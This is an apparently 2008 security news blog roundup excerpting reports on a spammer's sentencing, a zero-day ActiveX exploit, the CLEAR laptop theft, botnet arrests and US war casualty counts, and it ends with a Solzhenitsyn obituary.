Note: Yeah, sure it will be bigger, but somehow I doubt it will be better.

It will certainly be entertaining, no doubt.

But will it be groundbreaking?

Short answer: No, I don't think so.

I will not be at Black Hat/DefCon this year (I've been the past couple of years, but really -- I hate Vegas), but I will be covering any relevant security news coming out of there. So stay tuned.

- ferg

Spammer Soloway Once Felt 'Invincible'

Vanessa Ho writes in The Seattle Post-Intelligencer:

Strangers hated him, blamed him for wrecking their lives, deemed him a time-sucking pariah who grated on millions of people worldwide.

None of that mattered to Robert Soloway; it was part of his fortune, his way. As he vexed others, he drove Porsches, dressed in Prada, had a penthouse and lived a playboy's life.

But his insecurity was never far behind. By the time federal agents arrested him for spewing illegal e-mails, he didn't much protest the moniker they gave him – the Spam King.

"Here's my dysfunction," Soloway said recently. "It was that notoriety. People knew me. No one clapped for me at my high school graduation. Maybe it's not how I want to be famous, but (my thinking was) 'At least people know who I am.' "

Once considered one of the most prolific spammers in the world – sending millions of e-mails a day for years – Soloway was sentenced last month to nearly four years in prison after pleading guilty to tax evasion and e-mail and wire fraud.

More here.

U.S. Toll in Iraq, Afghanistan


Iraq and Afghanistan statistics via The Boston Globe (AP).

As of Monday, Aug. 4, 2008, at least 4,131 members of the U.S. military have died in the Iraq war since it began in March 2003, according to an Associated Press count.

The figure includes eight military civilians killed in action. At least 3,362 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Monday at 10 a.m. EDT.

As of Monday, Aug. 4, 2008, at least 491 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures July 26 at 10 a.m. EDT.

Of those, the military reports 347 were killed by hostile action.

More here and here.

And as always, the Iraq Coalition Casualty Count keeps the grim watch on their website here.

Honor the Fallen.

Online Threats Cost Consumers $8.5 Billion Over Last Two Years

Thomas Claburn writes on InformationWeek:

Consumers have lost almost $8.5 billion over the last two years to viruses, spyware, and phishing attacks. But computer security problems have been good for the computer business -- consumers replaced some 2.1 million computers due to malware infections.

Consumer Reports published these findings in its September issue as part of its annual State of the Net survey. The data is based on a survey of 2,071 online households conducted by the Consumer Reports National Research Center.

Among other notable data points: consumers have a 1 in 6 chance of being victimized by cybercrime, down from a 1 in 4 chance in 2007; 19% of respondents said they didn't have anti-virus software on their computer; and 75% of respondents said they didn't have an anti-phishing toolbar.

Consumer Reports also lists what it considers to be the seven most common online blunders. These include failing to keep anti-virus software up-to-date; clicking on e-mail links to access financial Web sites; using a single password for all online accounts; downloading free software; assuming that Macs are safer than Windows PCs; clicking on "scareware" pop-up ads that claim your computer is at risk; and shopping online without taking extra precautions.

More here.

Verified Identity Pass: CLEAR Suspended Following Laptop Theft - UPDATE

Via ABC7.com.

Verified Identity Pass, which operates under the brand name Clear, was suspended by the Transportation Security Administration Monday after a laptop containing personal information for 33,000 people signing up for their registered traveler program was stolen from San Francisco International Airport.

The company is in the process of notifying the people, who were signing up for an expedited airport check-in service, that their personal information may have been stolen.

Officials said a laptop containing the data was stolen from a locked office at the airport. The information on the laptop was not encrypted. There was no credit card data or any social security numbers stored on the laptop, but there were names, addresses and other personal data.

Verified Identity Pass will not be able to enroll new customers into the registered traveler program until the TSA verifies that the company is compliant with security procedures.

More here.

Hat-tip: Pogo Was Right

UPDATE: 13:03 PDT, 5 August 2008: Apparently, Verified Identity Pass now says they have recovered the missing PC, but there some rather disturbing questions remain. -ferg

Attackers Ramp Up Zero-Day ActiveX Exploits

Dan Kaplan writes on SC Magazine US:

Attacks taking advantage of a zero-day vulnerability in a Microsoft Active X control are increasing in prevalence, nearly a month since the flaw and ensuing exploit code first was announced.

The bug, which enables an attacker to gain privileges of a logged-on user to launch remote code, affects the ActiveX control for the Snapshot Viewer in Office Access 2000, 2002 and 2003, Microsoft has said.

"We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China," according to a Websense Security Labs blog entry. "There is currently no patch available, but Microsoft has several workarounds listed in their advisory."

Exploit code was posted to the exploit database Milw0rm on July 24, according to Websense.

More here.

Beijing Braces for Olympic Cyber-War

James Rogers writes on Dark Reading:

With the world’s eyes firmly focused on Beijing, officials and IT staff are bracing themselves for a flood of cyber-attacks when the Olympic Games begin later this week.

For months now, there has been growing speculation that the Games’ Websites and back-end storage infrastructure could be targeted when the Olympic flame is lit in Beijing’s Bird’s Nest stadium on Friday, either by cybercriminals or political activists.

More here.

Hat-tip: Intel Fusion

Dutch Botnet Herders Arrested

Jan Libbenga writes on The Register:


Dutch police have arrested two Dutch brothers suspected of running a botnet controlling 40,000 to 100,000 computers, with only a small portion (1,100 computers) based in the Netherlands.

The FBI has been investigating this case for a while before contacting the Dutch authorities. The arrests were made shortly after the two young bot-herders from the Frisian town of Sneek sold their network of compromised machines to a person in Brazil for €25,000 on Tuesday. The 35-year-old Brazilian man from Taubate (near Rio de Janeiro) has also been arrested and is awaiting extradition to the US.

More here.

Sunday, August 03, 2008

In Passing: Alexander Solzhenitsyn


Alexander Solzhenitsyn
December 11, 1918 – August 3, 2008